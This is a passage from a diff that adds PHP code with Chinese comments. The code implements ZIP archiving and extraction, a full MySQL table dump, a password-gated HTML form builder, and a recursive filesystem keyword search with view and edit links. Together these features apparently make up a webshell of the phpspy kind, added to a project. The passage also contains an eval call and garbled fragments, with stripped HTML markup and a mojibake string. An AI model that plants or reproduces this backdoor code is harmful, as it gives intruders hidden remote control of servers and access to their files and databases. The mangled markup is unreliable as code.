"\x50\x4b\x01\x02\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00"; + $cdrec .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) ); + $cdrec .= pack("v", 0 ).pack("v", 0 ).pack("v", 0 ).pack("v", 0 ); + $ext = "\xff\xff\xff\xff"; + $cdrec .= pack("V", 16 ).pack("V", $this -> old_offset ).$name; + + $this -> ctrl_dir[] = $cdrec; + $this -> old_offset = $new_offset; + $this -> dirs[] = $name; + } + function get_List($zip_name) + { + $zip = @fopen($zip_name, 'rb'); + if(!$zip) return(0); + $centd = $this->ReadCentralDir($zip,$zip_name); + @rewind($zip); + @fseek($zip, $centd['offset']); + for ($i=0; $i<$centd['entries']; $i++) + { + $header = $this->ReadCentralFileHeaders($zip); + $header['index'] = $i;$info['filename'] = $header['filename']; + $info['stored_filename'] = $header['stored_filename']; + $info['size'] = $header['size'];$info['compressed_size']=$header['compressed_size']; + $info['crc'] = strtoupper(dechex( $header['crc'] )); + $info['mtime'] = $header['mtime']; $info['comment'] = $header['comment']; + $info['folder'] = ($header['external']==0x41FF0010||$header['external']==16)?1:0; + $info['index'] = $header['index'];$info['status'] = $header['status']; + $ret[]=$info; unset($header); + } + return $ret; + } + function add_File($data, $name, $compact = 1) + { + $name = str_replace('\\', '/', $name); + $dtime = dechex($this->DosTime()); + + $hexdtime = '\x' . $dtime[6] . $dtime[7].'\x'.$dtime[4] . $dtime[5] + . '\x' . $dtime[2] . $dtime[3].'\x'.$dtime[0].$dtime[1]; + eval('$hexdtime = "' . $hexdtime . '";'); + + if($compact) + $fr = "\x50\x4b\x03\x04\x14\x00\x00\x00\x08\x00".$hexdtime; + else $fr = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00".$hexdtime; + $unc_len = strlen($data); $crc = crc32($data); + + if($compact){ + $zdata = gzcompress($data); $c_len = strlen($zdata); + $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); + }else{ + $zdata = $data; + } + $c_len=strlen($zdata); + $fr .= pack('V', $crc).pack('V', $c_len).pack('V', $unc_len); + $fr .= pack('v', strlen($name)).pack('v', 0).$name.$zdata; + + $fr .= pack('V', $crc).pack('V', $c_len).pack('V', $unc_len); + + $this -> datasec[] = $fr; + $new_offset = strlen(implode('', $this->datasec)); + if($compact) + $cdrec = "\x50\x4b\x01\x02\x00\x00\x14\x00\x00\x00\x08\x00"; + else $cdrec = "\x50\x4b\x01\x02\x14\x00\x0a\x00\x00\x00\x00\x00"; + $cdrec .= $hexdtime.pack('V', $crc).pack('V', $c_len).pack('V', $unc_len); + $cdrec .= pack('v', strlen($name) ).pack('v', 0 ).pack('v', 0 ); + $cdrec .= pack('v', 0 ).pack('v', 0 ).pack('V', 32 ); + $cdrec .= pack('V', $this -> old_offset ); + + $this -> old_offset = $new_offset; + $cdrec .= $name; + $this -> ctrl_dir[] = $cdrec; + return true; + } + + function DosTime() { + $timearray = getdate(); + if ($timearray['year'] < 1980) { + $timearray['year'] = 1980; $timearray['mon'] = 1; + $timearray['mday'] = 1; $timearray['hours'] = 0; + $timearray['minutes'] = 0; $timearray['seconds'] = 0; + } + return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | + ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); + } + function Extract ( $zn, $to, $index = Array(-1) ) + { + $ok = 0; $zip = @fopen($zn,'rb'); + if(!$zip) return(-1); + $cdir = $this->ReadCentralDir($zip,$zn); + $pos_entry = $cdir['offset']; + + if(!is_array($index)){ $index = array($index); } + for($i=0; $index[$i];$i++){ + if(intval($index[$i])!=$index[$i]||$index[$i]>$cdir['entries']) + return(-1); + } + + for ($i=0; $i<$cdir['entries']; $i++) + { + @fseek($zip, $pos_entry); + $header = $this->ReadCentralFileHeaders($zip); + $header['index'] = $i; $pos_entry = ftell($zip); + @rewind($zip); fseek($zip, $header['offset']); + if(in_array("-1",$index)||in_array($i,$index)) + $stat[$header['filename']]=$this->ExtractFile($header, $to, $zip); + + } + fclose($zip); + return $stat; + } + function ExtractFile($header,$to,$zip) + { + $header = $this->readfileheader($zip); + + if(substr($to,-1)!="/") $to.="/"; + if(!@is_dir($to)) @mkdir($to,0777); + + $pth = explode("/",dirname($header['filename'])); + for($i=0;isset($pth[$i]);$i++){ + if(!$pth[$i]) continue;$pthss.=$pth[$i]."/"; + if(!is_dir($to.$pthss)) @mkdir($to.$pthss,0777); + } + if (!($header['external']==0x41FF0010)&&!($header['external']==16)) + { + if ($header['compression']==0) + { + $fp = @fopen($to.$header['filename'], 'wb'); + if(!$fp) return(-1); + $size = $header['compressed_size']; + + while ($size != 0) + { + $read_size = ($size < 2048 ? $size : 2048); + $buffer = fread($zip, $read_size); + $binary_data = pack('a'.$read_size, $buffer); + @fwrite($fp, $binary_data, $read_size); + $size -= $read_size; + } + fclose($fp); + touch($to.$header['filename'], $header['mtime']); + + }else{ + $fp = @fopen($to.$header['filename'].'.gz','wb'); + if(!$fp) return(-1); + $binary_data = pack('va1a1Va1a1', 0x8b1f, Chr($header['compression']), + Chr(0x00), time(), Chr(0x00), Chr(3)); + + fwrite($fp, $binary_data, 10); + $size = $header['compressed_size']; + + while ($size != 0) + { + $read_size = ($size < 1024 ? $size : 1024); + $buffer = fread($zip, $read_size); + $binary_data = pack('a'.$read_size, $buffer); + @fwrite($fp, $binary_data, $read_size); + $size -= $read_size; + } + + $binary_data = pack('VV', $header['crc'], $header['size']); + fwrite($fp, $binary_data,8); fclose($fp); + + $gzp = @gzopen($to.$header['filename'].'.gz','rb') or die("Cette archive est compress閑"); + if(!$gzp) return(-2); + $fp = @fopen($to.$header['filename'],'wb'); + if(!$fp) return(-1); + $size = $header['size']; + + while ($size != 0) + { + $read_size = ($size < 2048 ? $size : 2048); + $buffer = gzread($gzp, $read_size); + $binary_data = pack('a'.$read_size, $buffer); + @fwrite($fp, $binary_data, $read_size); + $size -= $read_size; + } + fclose($fp); gzclose($gzp); + + touch($to.$header['filename'], $header['mtime']); + @unlink($to.$header['filename'].'.gz'); + + }} + return true; + } + function ReadFileHeader($zip) + { + $binary_data = fread($zip, 30); + $data = unpack('vchk/vid/vversion/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len', $binary_data); + + $header['filename'] = fread($zip, $data['filename_len']); + if ($data['extra_len'] != 0) { + $header['extra'] = fread($zip, $data['extra_len']); + } else { $header['extra'] = ''; } + + $header['compression'] = $data['compression'];$header['size'] = $data['size']; + $header['compressed_size'] = $data['compressed_size']; + $header['crc'] = $data['crc']; $header['flag'] = $data['flag']; + $header['mdate'] = $data['mdate'];$header['mtime'] = $data['mtime']; + + if ($header['mdate'] && $header['mtime']){ + $hour=($header['mtime']&0xF800)>>11;$minute=($header['mtime']&0x07E0)>>5; + $seconde=($header['mtime']&0x001F)*2;$year=(($header['mdate']&0xFE00)>>9)+1980; + $month=($header['mdate']&0x01E0)>>5;$day=$header['mdate']&0x001F; + $header['mtime'] = mktime($hour, $minute, $seconde, $month, $day, $year); + }else{$header['mtime'] = time();} + + $header['stored_filename'] = $header['filename']; + $header['status'] = "ok"; + return $header; + } +} +function addziparray($dir2) //添加ZIP文件 +{ + global $dir,$zipfilearray; + @$dirs=opendir($dir."/".$dir2); + while (@$file=readdir($dirs)) { + if(!is_dir("$dir/$dir2/$file")) { + $zipfilearray[]="$dir2/$file"; + } + elseif($file!="."&&$file!="..") { + addziparray("$dir2/$file"); + } + } + @closedir($dirs); +} + + // 备份数据库 + function sqldumptable($table, $fp=0) { + $tabledump = "DROP TABLE IF EXISTS $table;\n"; + $tabledump .= "CREATE TABLE $table (\n"; + + $firstfield=1; + + $fields = mysql_query("SHOW FIELDS FROM $table"); + while ($field = mysql_fetch_array($fields)) { + if (!$firstfield) { + $tabledump .= ",\n"; + } else { + $firstfield=0; + } + $tabledump .= " $field[Field] $field[Type]"; + if (!empty($field["Default"])) { + $tabledump .= " DEFAULT '$field[Default]'"; + } + if ($field['Null'] != "YES") { + $tabledump .= " NOT NULL"; + } + if ($field['Extra'] != "") { + $tabledump .= " $field[Extra]"; + } + } + mysql_free_result($fields); + + $keys = mysql_query("SHOW KEYS FROM $table"); + while ($key = mysql_fetch_array($keys)) { + $kname=$key['Key_name']; + if ($kname != "PRIMARY" and $key['Non_unique'] == 0) { + $kname="UNIQUE|$kname"; + } + if(!is_array($index[$kname])) { + $index[$kname] = array(); + } + $index[$kname][] = $key['Column_name']; + } + mysql_free_result($keys); + + while(list($kname, $columns) = @each($index)) { + $tabledump .= ",\n"; + $colnames=implode($columns,","); + + if ($kname == "PRIMARY") { + $tabledump .= " PRIMARY KEY ($colnames)"; + } else { + if (substr($kname,0,6) == "UNIQUE") { + $kname=substr($kname,7); + } + $tabledump .= " KEY $kname ($colnames)"; + } + } + + $tabledump .= "\n);\n\n"; + if ($fp) { + fwrite($fp,$tabledump); + } else { + echo $tabledump; + } + + $rows = mysql_query("SELECT * FROM $table"); + $numfields = mysql_num_fields($rows); + while ($row = mysql_fetch_array($rows)) { + $tabledump = "INSERT INTO $table VALUES("; + + $fieldcounter=-1; + $firstfield=1; + while (++$fieldcounter<$numfields) { + if (!$firstfield) { + $tabledump.=", "; + } else { + $firstfield=0; + } + + if (!isset($row[$fieldcounter])) { + $tabledump .= "NULL"; + } else { + $tabledump .= "'".mysql_escape_string($row[$fieldcounter])."'"; + } + } + + $tabledump .= ");\n"; + + if ($fp) { + fwrite($fp,$tabledump); + } else { + echo $tabledump; + } + } + mysql_free_result($rows); + } + + class FORMS { + function tableheader() { + echo "
+PassWord: + + +
\n"; + } + + function headerform($arg=array()) { + global $dir; + if ($arg[enctype]){ + $enctype="enctype=\"$arg[enctype]\""; + } else { + $enctype=""; + } + if (!isset($arg[method])) { + $arg[method] = "POST"; + } + if (!isset($arg[action])) { + $arg[action] = ''; + } + echo " \n"; + echo " \n"; + echo " \n"; + echo " \n"; + echo " \n"; + } + + function tdheader($title) { + global $dir; + echo " \n"; + echo " \n"; + echo " \n"; + } + + function tdbody($content,$align='center',$bgcolor='2',$height='',$extra='',$colspan='') { + if ($bgcolor=='2') { + $css="secondalt"; + } elseif ($bgcolor=='1') { + $css="firstalt"; + } else { + $css=$bgcolor; + } + $height = empty($height) ? "" : " height=".$height; + $colspan = empty($colspan) ? "" : " colspan=".$colspan; + echo " \n"; + echo " \n"; + echo " \n"; + } + function length($str){//可以统计中文字符 + $len=strlen($str); + $i=0; + while($i<$len){ + if(preg_match("/^[".chr(0xa1)."-".chr(0xff)."]+$/",$str[$i])){ + $i+=2; + }else{ + $i+=1; + } + $n+=1; + } + return $n; + } + function tablefooter() { + echo "
".$arg[content]."
".$title." [返回]
".$content."
\n"; + } + + function formheader($action='',$title,$target='') { + global $dir; + $target = empty($target) ? "" : " target=\"".$target."\""; + echo "
\n"; + echo " \n"; + echo " ".$title." [返回]\n"; + echo " \n"; + } + + function makehidden($name,$value=''){ + echo "\n"; + } + + function makeinput($name,$value='',$extra='',$type='text',$size='30',$css='input'){ + $css = ($css == 'input') ? " class=\"input\"" : ""; + $input = "\n"; + return $input; + } + + function maketextarea($name,$content='',$cols='100',$rows='20',$extra=''){ + $textarea = "\n"; + return $textarea; + } + + function formfooter($over='',$height=''){ + $height = empty($height) ? "" : " height=\"".$height."\""; + echo " \n"; + echo " \n"; + echo " \n"; + echo "
\n"; + echo $end = empty($over) ? "" : "\n"; + } + + function makeselect($arg = array()){ + if ($arg[multiple]==1) { + $multiple = " multiple"; + if ($arg[size]>0) { + $size = "size=$arg[size]"; + } + } + if ($arg[css]==0) { + $css = "class=\"input\""; + } + $select = "\n"; + return $select; + } + } + + function find($path) //查找关键词 +{ + global $_POST,$type,$type2,$endline,$beline,$nb; + if(is_dir("$path")){ + $tempdir=opendir("$path"); + while($f=readdir($tempdir)){ if($f=="."||$f=="..")continue; find("$path/$f");} + closedir($tempdir); + }else{ + if(filesize("$path")){ + $fp=fopen("$path","r"); + $msg=fread($fp, filesize("$path")); + fclose($fp); +if(strpos($msg, $_POST['oldkey']) !== false) { + $dir = dirname($path); + $file = basename($path); + $nb++; +if($type=="list"){ + $mymsg = explode("\n",$msg); + $long = count($mymsg); + $tmp = explode($oldkey,$msg); + $tmp = explode("\n",$tmp[0]); + $first = count($tmp); + $end = "[".$first."/".$long."]"; +} +if($type2=="getpath"){ + $get = explode($oldkey,$msg); + $get = strlen($get[0]); + if(isset($beline)){ + $get = $get-$beline; + } + $getpath = htmlspecialchars(substr($msg, $get, $endline)); + $getpath = "title = \"".$getpath."\""; +} +echo "找到:$dir/$file |view+edit | $end
"; +} + } + } +} +?>